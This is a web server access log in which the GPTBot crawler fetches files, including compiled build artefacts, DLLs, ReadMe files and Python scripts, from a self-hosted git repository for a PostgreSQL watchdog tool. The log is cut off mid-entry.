"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" -[17/Feb/2026:13:53:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 10854] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" -[17/Feb/2026:13:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10999] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:53:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/localpycs" -[17/Feb/2026:13:53:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 13037] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:53:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10998] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 11160] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" -[17/Feb/2026:13:53:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10184] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 48959] [Gzip 17.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:53:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:13:53:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9542] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:53:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 8598258] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" -[17/Feb/2026:13:53:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 17183] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:53:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 22899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:13:53:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 1765752] [Gzip 21.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:13:53:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:13:53:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 18352] [Gzip 11.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:53:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 10183] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:13:53:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:13:53:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 525807] [Gzip 23.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:13:53:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 299024] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:13:53:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libintl-8.dll" [Client 74.7.227.38] [Length 9907] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:13:53:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 76184] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:13:53:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libmodbus-5.dll" [Client 74.7.227.38] [Length 166068] [Gzip 20.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libmodbus-5.dll" -[17/Feb/2026:13:53:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libiconv-2.dll" [Client 74.7.227.38] [Length 1135869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:13:53:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 3141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:13:53:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 3636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:13:53:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 15771] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:13:53:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 83204] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" -[17/Feb/2026:13:53:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 16190] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" -[17/Feb/2026:13:53:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 12106] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor" -[17/Feb/2026:13:53:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:13:53:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:13:53:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 10161] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" -[17/Feb/2026:13:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 16783] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:13:53:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/files.zip" [Client 74.7.227.38] [Length 10846] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:13:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 10848] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" -[17/Feb/2026:13:53:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Postgres.ico" [Client 74.7.227.38] [Length 10807] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:13:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 9900] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md" -[17/Feb/2026:13:53:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:13:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 10408] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:53:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 10378] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 4095] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:53:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 21226] [Gzip 10.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 949] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:53:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 17707] [Gzip 9.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py" -[17/Feb/2026:13:53:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py" -[17/Feb/2026:13:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libpq.dll" [Client 74.7.227.38] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libpq.dll" -[17/Feb/2026:13:53:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Postgres.ico" [Client 74.7.227.38] [Length 9903] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Postgres.ico" -[17/Feb/2026:13:53:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md" [Client 